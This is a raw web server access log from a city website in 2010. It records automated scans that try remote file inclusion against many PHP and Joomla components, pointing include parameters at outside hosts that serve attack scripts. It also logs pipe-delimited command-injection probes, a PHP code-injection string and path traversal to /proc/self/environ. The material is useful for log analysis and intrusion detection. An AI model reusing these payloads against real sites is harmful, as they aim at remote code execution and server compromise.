202.29.92.6 - - [31/Aug/2010:22:59:34 -0700] "GET /logs/access_091201.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.inhausa.org/data/error?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
202.29.92.6 - - [31/Aug/2010:22:59:44 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.inhausa.org/data/error?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
202.29.92.6 - - [31/Aug/2010:22:59:44 -0700] "GET /logs/access_091201.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.inhausa.org/data/error?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
202.29.92.6 - - [31/Aug/2010:22:59:44 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.inhausa.org/data/error?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
82.211.8.145 - - [31/Aug/2010:23:14:29 -0700] "GET /index.php?pageURL=ftp://webscr13:k1k2k3.xpg.com.br/Envi.php? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
82.211.8.145 - - [31/Aug/2010:23:30:27 -0700] "GET /logs/access_091201.log//index.php?pageURL=ftp://webscr13:k1k2k3.xpg.com.br/Envi.php? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
82.211.8.145 - - [31/Aug/2010:23:30:28 -0700] "GET /index.php?pageURL=ftp://webscr13:k1k2k3.xpg.com.br/Envi.php? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
82.211.8.145 - - [31/Aug/2010:23:30:28 -0700] "GET /logs//index.php?pageURL=ftp://webscr13:k1k2k3.xpg.com.br/Envi.php? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
187.45.193.226 - - [31/Aug/2010:23:39:55 -0700] "GET /logs/access_100201.log%20%20//spaw_control.class.php?spaw_root=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
187.45.193.226 - - [31/Aug/2010:23:39:55 -0700] "GET /spaw_control.class.php?spaw_root=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
187.45.193.226 - - [31/Aug/2010:23:39:55 -0700] "GET /logs//spaw_control.class.php?spaw_root=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
187.45.193.226 - - [31/Aug/2010:23:39:56 -0700] "GET /logs//spaw_control.class.php?spaw_root=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
187.45.193.226 - - [31/Aug/2010:23:39:56 -0700] "GET /spaw_control.class.php?spaw_root=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
187.45.193.226 - - [31/Aug/2010:23:39:56 -0700] "GET /logs/access_100201.log%20%20//spaw_control.class.php?spaw_root=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
187.45.193.226 - - [31/Aug/2010:23:42:08 -0700] "GET /logs/access_091201.log%20%20//spaw_control.class.php?spaw_root=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
187.45.193.226 - - [31/Aug/2010:23:42:15 -0700] "GET /logs/access_091201.log%20%20//spaw_control.class.php?spaw_root=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
187.45.193.226 - - [31/Aug/2010:23:42:36 -0700] "GET /spaw_control.class.php?spaw_root=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
187.45.193.226 - - [31/Aug/2010:23:42:36 -0700] "GET /logs/access_091201.log//spaw_control.class.php?spaw_root=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
187.45.193.226 - - [31/Aug/2010:23:42:36 -0700] "GET /logs//spaw_control.class.php?spaw_root=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
187.45.193.226 - - [31/Aug/2010:23:42:40 -0700] "GET /spaw_control.class.php?spaw_root=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
187.45.193.226 - - [31/Aug/2010:23:42:40 -0700] "GET /logs/access_091201.log//spaw_control.class.php?spaw_root=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
187.45.193.226 - - [31/Aug/2010:23:42:40 -0700] "GET /logs//spaw_control.class.php?spaw_root=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
67.205.76.181 - - [31/Aug/2010:23:45:30 -0700] "GET /logs/access_100201.log HTTP/1.1" 200 4513232 "/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)" "cityofarkadelphia.com"
62.149.233.199 - - [31/Aug/2010:23:47:30 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://repsolan.zoomshare.com/files/spread/Ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "cityofarkadelphia.com"
62.149.233.199 - - [31/Aug/2010:23:47:40 -0700] "GET /logs/access_091201.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://repsolan.zoomshare.com/files/spread/Ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "cityofarkadelphia.com"
62.149.233.199 - - [31/Aug/2010:23:47:45 -0700] "GET /logs/access_091201.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "cityofarkadelphia.com"
62.149.233.199 - - [31/Aug/2010:23:48:06 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "cityofarkadelphia.com"
204.188.241.2 - - [31/Aug/2010:23:49:58 -0700] "GET /logs/access_100201.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
204.188.241.2 - - [31/Aug/2010:23:49:58 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
204.188.241.2 - - [31/Aug/2010:23:49:58 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
204.188.241.2 - - [31/Aug/2010:23:52:55 -0700] "GET /logs/access.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.149.233.199 - - [31/Aug/2010:23:53:06 -0700] "GET /logs/access_091231.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://repsolan.zoomshare.com/files/spread/Ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "cityofarkadelphia.com"
62.149.233.199 - - [31/Aug/2010:23:53:14 -0700] "GET /logs/access_091231.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "cityofarkadelphia.com"
74.55.250.50 - - [31/Aug/2010:23:59:10 -0700] "GET /logs/index2.php?url_page=http://divecity.ru/administrator/components/com_joomlapack/js/black.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
74.55.250.50 - - [31/Aug/2010:23:59:10 -0700] "GET /logs/access_091231.log%20%20/index2.php?url_page=http://divecity.ru/administrator/components/com_joomlapack/js/black.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
74.55.250.50 - - [31/Aug/2010:23:59:10 -0700] "GET /index2.php?url_page=http://divecity.ru/administrator/components/com_joomlapack/js/black.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.123.133.130 - - [31/Aug/2010:23:59:11 -0700] "GET /logs/access_091231.log%20%20/index2.php?url_page=http://divecity.ru/administrator/components/com_joomlapack/js/black.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.123.133.130 - - [31/Aug/2010:23:59:11 -0700] "GET /index2.php?url_page=http://divecity.ru/administrator/components/com_joomlapack/js/black.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.123.133.130 - - [31/Aug/2010:23:59:11 -0700] "GET /logs/index2.php?url_page=http://divecity.ru/administrator/components/com_joomlapack/js/black.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.123.133.130 - - [31/Aug/2010:23:59:40 -0700] "GET /logs/access_091231.log/index2.php?url_page=http://divecity.ru/administrator/components/com_joomlapack/js/black.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
74.55.250.50 - - [31/Aug/2010:23:59:41 -0700] "GET /logs/access_091231.log/index2.php?url_page=http://divecity.ru/administrator/components/com_joomlapack/js/black.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.122.36.34 - - [01/Sep/2010:00:17:46 -0700] "GET /delete_comment.php?board_skin_path=http://bulusari.net/ircat/Fid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.122.36.34 - - [01/Sep/2010:00:17:50 -0700] "GET /logs/access_091201.log//delete_comment.php?board_skin_path=http://bulusari.net/ircat/Fid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.122.36.34 - - [01/Sep/2010:00:17:50 -0700] "GET /logs//delete_comment.php?board_skin_path=http://bulusari.net/ircat/Fid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.123.133.130 - - [01/Sep/2010:00:19:55 -0700] "GET /bemarket/postscript/postscript.php?p_mode=http://divecity.ru/administrator/components/com_joomlapack/js/black.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.123.133.130 - - [01/Sep/2010:00:19:55 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://divecity.ru/administrator/components/com_joomlapack/js/black.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.123.133.130 - - [01/Sep/2010:00:19:55 -0700] "GET /logs/access_091201.log%20%20//bemarket/postscript/postscript.php?p_mode=http://divecity.ru/administrator/components/com_joomlapack/js/black.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
74.55.250.50 - - [01/Sep/2010:00:20:23 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://divecity.ru/administrator/components/com_joomlapack/js/black.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
74.55.250.50 - - [01/Sep/2010:00:20:24 -0700] "GET /bemarket/postscript/postscript.php?p_mode=http://divecity.ru/administrator/components/com_joomlapack/js/black.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
74.55.250.50 - - [01/Sep/2010:00:20:24 -0700] "GET /logs/access_091201.log%20%20//bemarket/postscript/postscript.php?p_mode=http://divecity.ru/administrator/components/com_joomlapack/js/black.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.122.36.34 - - [01/Sep/2010:00:23:19 -0700] "GET /logs//delete_comment.php?board_skin_path=http://bulusari.net/ircat/Fid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.122.36.34 - - [01/Sep/2010:00:23:19 -0700] "GET /logs/access_091201.log//delete_comment.php?board_skin_path=http://bulusari.net/ircat/Fid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.122.36.34 - - [01/Sep/2010:00:23:19 -0700] "GET /delete_comment.php?board_skin_path=http://bulusari.net/ircat/Fid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.122.36.34 - - [01/Sep/2010:00:24:35 -0700] "GET /logs/access_091201.log%20%20//delete_comment.php?board_skin_path=http://bulusari.net/ircat/Fid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.122.36.34 - - [01/Sep/2010:00:24:35 -0700] "GET /logs//delete_comment.php?board_skin_path=http://bulusari.net/ircat/Fid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.122.36.34 - - [01/Sep/2010:00:24:35 -0700] "GET /delete_comment.php?board_skin_path=http://bulusari.net/ircat/Fid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.149.233.199 - - [01/Sep/2010:00:33:06 -0700] "GET /logs/access_091201.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "cityofarkadelphia.com"
222.236.47.182 - - [01/Sep/2010:00:36:44 -0700] "GET /delete.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [01/Sep/2010:00:36:44 -0700] "GET /logs/delete.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [01/Sep/2010:00:36:44 -0700] "GET /logs/access_091201.log/delete.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
184.107.48.144 - - [01/Sep/2010:00:37:14 -0700] "GET /selectlang.php?BBC_LANGUAGE_PATH=http://www.fileden.com/files/2010/8/29/2955096/expl/fx29id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
184.107.48.144 - - [01/Sep/2010:00:37:14 -0700] "GET /logs/access_091031.log/selectlang.php?BBC_LANGUAGE_PATH=http://www.fileden.com/files/2010/8/29/2955096/expl/fx29id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
184.107.48.144 - - [01/Sep/2010:00:37:14 -0700] "GET /logs/selectlang.php?BBC_LANGUAGE_PATH=http://www.fileden.com/files/2010/8/29/2955096/expl/fx29id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
184.107.48.144 - - [01/Sep/2010:00:38:25 -0700] "GET /logs/access_091031.log%20%20/selectlang.php?BBC_LANGUAGE_PATH=http://www.fileden.com/files/2010/8/29/2955096/expl/fx29id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
118.129.166.221 - - [01/Sep/2010:00:38:27 -0700] "GET /logs/access_091201.log%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kwiketa-skwirk.com/images/id1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
118.129.166.221 - - [01/Sep/2010:00:38:27 -0700] "GET /comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kwiketa-skwirk.com/images/id1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
118.129.166.221 - - [01/Sep/2010:00:38:33 -0700] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kwiketa-skwirk.com/images/id1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
118.129.166.221 - - [01/Sep/2010:00:39:36 -0700] "GET /logs/access_091201.log%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kwiketa-skwirk.com/images/id1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
118.129.166.221 - - [01/Sep/2010:00:39:36 -0700] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kwiketa-skwirk.com/images/id1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
118.129.166.221 - - [01/Sep/2010:00:39:36 -0700] "GET /comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kwiketa-skwirk.com/images/id1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
184.107.48.144 - - [01/Sep/2010:00:40:06 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fileden.com/files/2010/8/29/2955096/expl/fx29id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
184.107.48.144 - - [01/Sep/2010:00:40:06 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fileden.com/files/2010/8/29/2955096/expl/fx29id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
184.107.48.144 - - [01/Sep/2010:00:40:06 -0700] "GET /logs/access.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fileden.com/files/2010/8/29/2955096/expl/fx29id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
184.107.48.144 - - [01/Sep/2010:00:40:18 -0700] "GET /logs/access_100201.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fileden.com/files/2010/8/29/2955096/expl/fx29id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
213.180.207.227 - - [01/Sep/2010:00:43:32 -0700] "GET / HTTP/1.1" 200 917 "-" "Mozilla/5.0 (compatible; YandexFavicons/1.0; +http://yandex.com/bots)" "cityofarkadelphia.com"
213.180.207.227 - - [01/Sep/2010:00:43:32 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexFavicons/1.0; +http://yandex.com/bots)" "cityofarkadelphia.com"
118.129.166.221 - - [01/Sep/2010:00:45:32 -0700] "GET /logs/access_091201.log//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kwiketa-skwirk.com/images/id1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
118.129.166.221 - - [01/Sep/2010:00:46:28 -0700] "GET /logs/access_091201.log//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kwiketa-skwirk.com/images/id1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
91.121.132.142 - - [01/Sep/2010:00:55:15 -0700] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4084 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
91.121.132.142 - - [01/Sep/2010:00:55:16 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 917 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
94.23.213.213 - - [01/Sep/2010:00:55:17 -0700] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4084 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
94.23.213.213 - - [01/Sep/2010:00:55:17 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 917 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
188.165.209.176 - - [01/Sep/2010:00:55:46 -0700] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4084 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
188.165.209.176 - - [01/Sep/2010:00:55:46 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 917 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
94.23.213.213 - - [01/Sep/2010:00:55:54 -0700] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4084 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
94.23.213.213 - - [01/Sep/2010:00:55:55 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 917 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
109.169.29.135 - - [01/Sep/2010:00:56:09 -0700] "GET / HTTP/1.1" 200 917 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB6 (.NET CLR 3.5.30729)" "cityofarkadelphia.com"
187.45.193.226 - - [01/Sep/2010:01:02:43 -0700] "GET /appserv/main.php?appserv_root=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
187.45.193.226 - - [01/Sep/2010:01:02:43 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
187.45.193.226 - - [01/Sep/2010:01:02:43 -0700] "GET /logs/access_091231.log%20%20//appserv/main.php?appserv_root=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
187.45.193.226 - - [01/Sep/2010:01:02:44 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
187.45.193.226 - - [01/Sep/2010:01:02:44 -0700] "GET /logs/access_091231.log%20%20//appserv/main.php?appserv_root=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
187.45.193.226 - - [01/Sep/2010:01:02:44 -0700] "GET /appserv/main.php?appserv_root=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
212.227.54.140 - - [01/Sep/2010:01:03:55 -0700] "GET /index.php?option=com_jcalpro&mosConfig.absolute.path=http://www.ulster.irishhome.net/archive/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
212.227.54.140 - - [01/Sep/2010:01:03:55 -0700] "GET /logs/access_100201.log%20%20//index.php?option=com_jcalpro&mosConfig.absolute.path=http://www.ulster.irishhome.net/archive/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
212.227.54.140 - - [01/Sep/2010:01:03:55 -0700] "GET /logs//index.php?option=com_jcalpro&mosConfig.absolute.path=http://www.ulster.irishhome.net/archive/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
212.227.54.140 - - [01/Sep/2010:01:07:15 -0700] "GET /logs/access_100201.log//index.php?option=com_jcalpro&mosConfig.absolute.path=http://www.ulster.irishhome.net/archive/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
212.227.54.140 - - [01/Sep/2010:01:07:15 -0700] "GET /logs/access.log//index.php?option=com_jcalpro&mosConfig.absolute.path=http://www.ulster.irishhome.net/archive/byz9991.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:08:28 -0700] "GET /components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://ruth.doiz.net/include/makers/kodak.php/CKrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:08:28 -0700] "GET /logs//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://ruth.doiz.net/include/makers/kodak.php/CKrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:08:28 -0700] "GET /logs/access_091201.log//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://ruth.doiz.net/include/makers/kodak.php/CKrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:08:29 -0700] "GET /logs//components/com_mgm/help.mgm.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:08:29 -0700] "GET /components/com_mgm/help.mgm.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:08:29 -0700] "GET /logs/access_091201.log//components/com_mgm/help.mgm.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:08:39 -0700] "GET /components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://ruth.doiz.net/include/makers/kodak.php/CKrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:08:39 -0700] "GET /components/com_mgm/help.mgm.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:08:42 -0700] "GET /components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:08:42 -0700] "GET /logs//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:08:42 -0700] "GET /logs/access_091231.log%20%20//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
